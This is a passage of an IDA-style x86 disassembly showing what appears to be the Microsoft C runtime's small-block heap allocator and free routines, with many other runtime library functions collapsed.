jmp short loc_41E8CC
; ---------------------------------------------------------------------------
loc_41E8C9: ; CODE XREF: sub_41E742+ED�j
mov ebx, [ebp+arg_0]
loc_41E8CC: ; CODE XREF: sub_41E742+185�j
cmp [ebp+var_C], 0
jnz short loc_41E8DA
cmp ebx, edx
jz loc_41E95B
loc_41E8DA: ; CODE XREF: sub_41E742+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41E95B
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41E932
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E921
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41E921: ; CODE XREF: sub_41E742+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41E95B
; ---------------------------------------------------------------------------
loc_41E932: ; CODE XREF: sub_41E742+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E948
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41E948: ; CODE XREF: sub_41E742+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41E95B: ; CODE XREF: sub_41E742+192�j
; sub_41E742+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41EA66
mov eax, Dst
test eax, eax
jz loc_41EA58
mov ecx, dword_4DD36C
mov esi, ds:dword_427068
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_4DD36C
mov eax, Dst
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, Dst
mov ecx, dword_4DD36C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, Dst
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, Dst
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41E9E9
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, Dst
loc_41E9E9: ; CODE XREF: sub_41E742+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41EA58
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, Dst
push dword ptr [eax+10h]
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
mov eax, dword_4DD378
mov edx, dword_4DD37C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, Dst
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx ; Size
lea ecx, [eax+14h]
push ecx ; Src
push eax ; Dst
call _memcpy_0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4DD378
cmp eax, Dst
jbe short loc_41EA4E
sub [ebp+arg_0], 14h
loc_41EA4E: ; CODE XREF: sub_41E742+306�j
mov eax, dword_4DD37C
mov dword_4DD370, eax
loc_41EA58: ; CODE XREF: sub_41E742+234�j
; sub_41E742+2AB�j
mov eax, [ebp+arg_0]
mov dword_4DD36C, edi
mov Dst, eax
loc_41EA66: ; CODE XREF: sub_41E742+38�j
; sub_41E742+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E742 endp
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002F6 BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41F216 proc near ; CODE XREF: sub_41E672+41�p
; sub_41F50E:loc_41F6DD�p
cmp dword_43AE60, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41F22A
mov esi, offset off_43AE50
jmp short loc_41F247
; ---------------------------------------------------------------------------
loc_41F22A: ; CODE XREF: sub_41F216+B�j
push 2020h
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_41F353
loc_41F247: ; CODE XREF: sub_41F216+12�j
mov ebp, ds:dword_427064
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41F33C
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_41F32E
mov eax, offset off_43AE50
cmp esi, eax
jnz short loc_41F2A6
cmp off_43AE50, 0
jnz short loc_41F296
mov off_43AE50, eax
loc_41F296: ; CODE XREF: sub_41F216+79�j
cmp off_43AE54, 0
jnz short loc_41F2BB
mov off_43AE54, eax
jmp short loc_41F2BB
; ---------------------------------------------------------------------------
loc_41F2A6: ; CODE XREF: sub_41F216+70�j
mov [esi], eax
mov eax, off_43AE54
mov [esi+4], eax
mov off_43AE54, esi
mov eax, [esi+4]
mov [eax], esi
loc_41F2BB: ; CODE XREF: sub_41F216+87�j
; sub_41F216+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41F2DD: ; CODE XREF: sub_41F216+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41F2DD
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
loc_41F306: ; CODE XREF: sub_41F216+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41F32A
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41F306
; ---------------------------------------------------------------------------
loc_41F32A: ; CODE XREF: sub_41F216+F7�j
mov eax, esi
jmp short loc_41F355
; ---------------------------------------------------------------------------
loc_41F32E: ; CODE XREF: sub_41F216+63�j
push 8000h
push 0
push edi
call ds:dword_427068 ; VirtualFree
loc_41F33C: ; CODE XREF: sub_41F216+4B�j
cmp esi, offset off_43AE50
jz short loc_41F353
push esi
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
loc_41F353: ; CODE XREF: sub_41F216+2B�j
; sub_41F216+12C�j
xor eax, eax
loc_41F355: ; CODE XREF: sub_41F216+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41F216 endp
; =============== S U B R O U T I N E =======================================
sub_41F35A proc near ; CODE XREF: sub_41F3B0+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call ds:dword_427068 ; VirtualFree
cmp off_43CE70, esi
jnz short loc_41F37F
mov eax, [esi+4]
mov off_43CE70, eax
loc_41F37F: ; CODE XREF: sub_41F35A+1B�j
cmp esi, offset off_43AE50
jz short loc_41F3A7
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F3A7: ; CODE XREF: sub_41F35A+2B�j
or dword_43AE60, 0FFFFFFFFh
pop esi
retn
sub_41F35A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F3B0 proc near ; CODE XREF: sub_41F4C9+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_43AE54
push edi
loc_41F3BD: ; CODE XREF: sub_41F3B0+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41F45B
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41F3D6: ; CODE XREF: sub_41F3B0+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41F417
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call ds:dword_427068 ; VirtualFree
test eax, eax
jz short loc_41F417
or dword ptr [edi], 0FFFFFFFFh
dec dword_4DBE40
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41F40C
cmp eax, edi
jbe short loc_41F40F
loc_41F40C: ; CODE XREF: sub_41F3B0+56�j
mov [esi+0Ch], edi
loc_41F40F: ; CODE XREF: sub_41F3B0+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41F424
loc_41F417: ; CODE XREF: sub_41F3B0+2C�j
; sub_41F3B0+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41F3D6
loc_41F424: ; CODE XREF: sub_41F3B0+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41F45B
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41F45B
push 1
lea eax, [ecx+20h]
pop edx
loc_41F43B: ; CODE XREF: sub_41F3B0+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41F44C
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41F43B
loc_41F44C: ; CODE XREF: sub_41F3B0+8E�j
cmp edx, 400h
jnz short loc_41F45B
push ecx
call sub_41F35A
pop ecx
loc_41F45B: ; CODE XREF: sub_41F3B0+11�j
; sub_41F3B0+7D�j ...
cmp esi, off_43AE54
jz short loc_41F46D
cmp [ebp+arg_0], 0
jg loc_41F3BD
loc_41F46D: ; CODE XREF: sub_41F3B0+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F3B0 endp
; =============== S U B R O U T I N E =======================================
sub_41F472 proc near ; CODE XREF: sub_41BA91+3A�p
; sub_41BBE2+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_43AE50
push esi
mov ecx, edx
loc_41F47E: ; CODE XREF: sub_41F472+1C�j
cmp eax, [ecx+10h]
jbe short loc_41F488
cmp eax, [ecx+14h]
jb short loc_41F490
loc_41F488: ; CODE XREF: sub_41F472+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41F4C5
jmp short loc_41F47E
; ---------------------------------------------------------------------------
loc_41F490: ; CODE XREF: sub_41F472+14�j
test al, 0Fh
jnz short loc_41F4C5
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41F4C5
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41F4C5: ; CODE XREF: sub_41F472+1A�j
; sub_41F472+20�j ...
xor eax, eax
pop esi
retn
sub_41F472 endp
; =============== S U B R O U T I N E =======================================
sub_41F4C9 proc near ; CODE XREF: sub_41BA91+4D�p
; sub_41BBE2+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41F50D
inc dword_4DBE40
cmp dword_4DBE40, 20h
jnz short locret_41F50D
push 10h
call sub_41F3B0
pop ecx
locret_41F50D: ; CODE XREF: sub_41F4C9+2B�j
; sub_41F4C9+3A�j
retn
sub_41F4C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F50E proc near ; CODE XREF: sub_41BBE2+1AC�p
; sub_41BEF3+4A�p ...
Val = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_43CE70
push edi
loc_41F51C: ; CODE XREF: sub_41F50E+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41F5C7
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41F581
loc_41F547: ; CODE XREF: sub_41F50E+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41F56A
cmp [edi+4], ebx
jbe short loc_41F56A
push ebx
push ecx
push eax
call sub_41F716
add esp, 0Ch
test eax, eax
jnz short loc_41F5D9
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41F56A: ; CODE XREF: sub_41F50E+40�j
; sub_41F50E+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41F547
jmp short loc_41F584
; ---------------------------------------------------------------------------
loc_41F581: ; CODE XREF: sub_41F50E+37�j
mov ebx, [ebp+arg_0]
loc_41F584: ; CODE XREF: sub_41F50E+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+Val], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41F5CA
loc_41F597: ; CODE XREF: sub_41F50E+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41F5B6
cmp [edi+4], ebx
jbe short loc_41F5B6
push ebx
push eax
push [ebp+var_4]
call sub_41F716
add esp, 0Ch
test eax, eax
jnz short loc_41F5D9
mov [edi+4], ebx
loc_41F5B6: ; CODE XREF: sub_41F50E+8D�j
; sub_41F50E+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+Val]
jb short loc_41F597
jmp short loc_41F5CA
; ---------------------------------------------------------------------------
loc_41F5C7: ; CODE XREF: sub_41F50E+14�j
mov ebx, [ebp+arg_0]
loc_41F5CA: ; CODE XREF: sub_41F50E+87�j
; sub_41F50E+B7�j
mov esi, [esi]
cmp esi, off_43CE70
jz short loc_41F5E9
jmp loc_41F51C
; ---------------------------------------------------------------------------
loc_41F5D9: ; CODE XREF: sub_41F50E+54�j
; sub_41F50E+A3�j
mov off_43CE70, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41F711
; ---------------------------------------------------------------------------
loc_41F5E9: ; CODE XREF: sub_41F50E+C4�j
mov eax, offset off_43AE50
mov edi, eax
loc_41F5F0: ; CODE XREF: sub_41F50E+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41F5FC
cmp dword ptr [edi+0Ch], 0
jnz short loc_41F608
loc_41F5FC: ; CODE XREF: sub_41F50E+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41F6DD
jmp short loc_41F5F0
; ---------------------------------------------------------------------------
loc_41F608: ; CODE XREF: sub_41F50E+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41F637
loc_41F626: ; CODE XREF: sub_41F50E+127�j
cmp [ebp+var_4], 10h
jge short loc_41F637
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41F626
loc_41F637: ; CODE XREF: sub_41F50E+116�j
; sub_41F50E+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+Val], eax
call ds:dword_427064 ; VirtualAlloc
cmp eax, esi
jnz loc_41F70F
push 0 ; Size
push [ebp+Val] ; Val
push esi ; Dst
call _memset
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41F69E
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_41F674: ; CODE XREF: sub_41F50E+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41F674
loc_41F69E: ; CODE XREF: sub_41F50E+15E�j
mov off_43CE70, edi
lea eax, [edi+2018h]
loc_41F6AA: ; CODE XREF: sub_41F50E+1A8�j
cmp ecx, eax
jnb short loc_41F6BA
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41F6B8
add ecx, 8
jmp short loc_41F6AA
; ---------------------------------------------------------------------------
loc_41F6B8: ; CODE XREF: sub_41F50E+1A3�j
cmp ecx, eax
loc_41F6BA: ; CODE XREF: sub_41F50E+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41F711
; ---------------------------------------------------------------------------
loc_41F6DD: ; CODE XREF: sub_41F50E+F2�j
call sub_41F216
test eax, eax
jz short loc_41F70F
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_43CE70, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41F711
; ---------------------------------------------------------------------------
loc_41F70F: ; CODE XREF: sub_41F50E+143�j
; sub_41F50E+1D6�j
xor eax, eax
loc_41F711: ; CODE XREF: sub_41F50E+D6�j
; sub_41F50E+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41F50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F716 proc near ; CODE XREF: sub_41F50E+4A�p
; sub_41F50E+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41F75B
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41F74A
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41F753
; ---------------------------------------------------------------------------
loc_41F74A: ; CODE XREF: sub_41F716+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41F753: ; CODE XREF: sub_41F716+32�j
lea eax, [edi+8]
jmp loc_41F829
; ---------------------------------------------------------------------------
loc_41F75B: ; CODE XREF: sub_41F716+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41F764
mov eax, esi
loc_41F764: ; CODE XREF: sub_41F716+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41F7AE
loc_41F76B: ; CODE XREF: sub_41F716+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41F7A1
push 1
lea ebx, [eax+1]
pop esi
loc_41F777: ; CODE XREF: sub_41F716+68�j
cmp byte ptr [ebx], 0
jnz short loc_41F780
inc ebx
inc esi
jmp short loc_41F777
; ---------------------------------------------------------------------------
loc_41F780: ; CODE XREF: sub_41F716+64�j
cmp esi, edx
jnb short loc_41F7D2
cmp eax, [ebp+var_4]
jnz short loc_41F78E
mov [ecx+4], esi
jmp short loc_41F79A
; ---------------------------------------------------------------------------
loc_41F78E: ; CODE XREF: sub_41F716+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41F833
loc_41F79A: ; CODE XREF: sub_41F716+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41F7A6
; ---------------------------------------------------------------------------
loc_41F7A1: ; CODE XREF: sub_41F716+59�j
movzx esi, bl
add eax, esi
loc_41F7A6: ; CODE XREF: sub_41F716+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41F76B
loc_41F7AE: ; CODE XREF: sub_41F716+53�j
lea esi, [ecx+8]
loc_41F7B1: ; CODE XREF: sub_41F716+EB�j
; sub_41F716+F2�j
cmp esi, edi
jnb short loc_41F833
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41F833
mov al, [esi]
test al, al
jnz short loc_41F803
push 1
lea ebx, [esi+1]
pop eax
loc_41F7C9: ; CODE XREF: sub_41F716+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41F7F3
inc ebx
inc eax
jmp short loc_41F7C9
; ---------------------------------------------------------------------------
loc_41F7D2: ; CODE XREF: sub_41F716+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41F7E3
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41F7EC
; ---------------------------------------------------------------------------
loc_41F7E3: ; CODE XREF: sub_41F716+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41F7EC: ; CODE XREF: sub_41F716+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F7F3: ; CODE XREF: sub_41F716+B6�j
cmp eax, edx
jnb short loc_41F80A
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41F833
mov esi, ebx
jmp short loc_41F7B1
; ---------------------------------------------------------------------------
loc_41F803: ; CODE XREF: sub_41F716+AB�j
movzx eax, al
add esi, eax
jmp short loc_41F7B1
; ---------------------------------------------------------------------------
loc_41F80A: ; CODE XREF: sub_41F716+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41F81B
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41F824
; ---------------------------------------------------------------------------
loc_41F81B: ; CODE XREF: sub_41F716+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41F824: ; CODE XREF: sub_41F716+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41F829: ; CODE XREF: sub_41F716+40�j
; sub_41F716+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41F835
; ---------------------------------------------------------------------------
loc_41F833: ; CODE XREF: sub_41F716+7E�j
; sub_41F716+9D�j ...
xor eax, eax
loc_41F835: ; CODE XREF: sub_41F716+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F716 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F83A proc near ; CODE XREF: sub_41BBE2+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41F874
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41F8D4
; ---------------------------------------------------------------------------
loc_41F874: ; CODE XREF: sub_41F83A+26�j
jnb short loc_41F8DB
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41F8DB
lea eax, [ecx+edx]
loc_41F889: ; CODE XREF: sub_41F83A+59�j
cmp eax, esi
jnb short loc_41F897
cmp byte ptr [eax], 0
jnz short loc_41F895
inc eax
jmp short loc_41F889
; ---------------------------------------------------------------------------
loc_41F895: ; CODE XREF: sub_41F83A+56�j
cmp eax, esi
loc_41F897: ; CODE XREF: sub_41F83A+51�j
jnz short loc_41F8DB
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41F8CF
cmp esi, eax
jbe short loc_41F8CF
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41F8C6
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41F8C1
loc_41F8BA: ; CODE XREF: sub_41F83A+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41F8BA
loc_41F8C1: ; CODE XREF: sub_41F83A+7E�j
mov [ebx+4], eax
jmp short loc_41F8CF
; ---------------------------------------------------------------------------
loc_41F8C6: ; CODE XREF: sub_41F83A+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41F8CF: ; CODE XREF: sub_41F83A+68�j
; sub_41F83A+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41F8D4: ; CODE XREF: sub_41F83A+38�j
mov [ebp+var_4], 1
loc_41F8DB: ; CODE XREF: sub_41F83A:loc_41F874�j
; sub_41F83A+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41F83A endp
; [000000D9 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001F6 BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000170 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000078 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [00000115 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000721 BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_420660 dd offset $NORMAL_STATE$1535 ; DATA XREF: __output+6E�r
dd offset loc_41FFB4 ; jump table for switch statement
dd offset loc_41FFCF
dd offset loc_42001B
dd offset loc_420052
dd offset loc_42005A
dd offset loc_42008F
dd offset loc_420122
; [00000035 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; [0000000D BYTES: COLLAPSED FUNCTION _get_int_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION _get_int64_arg. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION _get_short_arg. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000008A BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
; [000000CC BYTES: COLLAPSED FUNCTION _toupper. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000A25 BYTES: COLLAPSED FUNCTION __input. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION _fgetc. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __un_inc. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
; [00000053 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
; [00000098 BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
; [000002B3 BYTES: COLLAPSED FUNCTION __raise_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000217 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
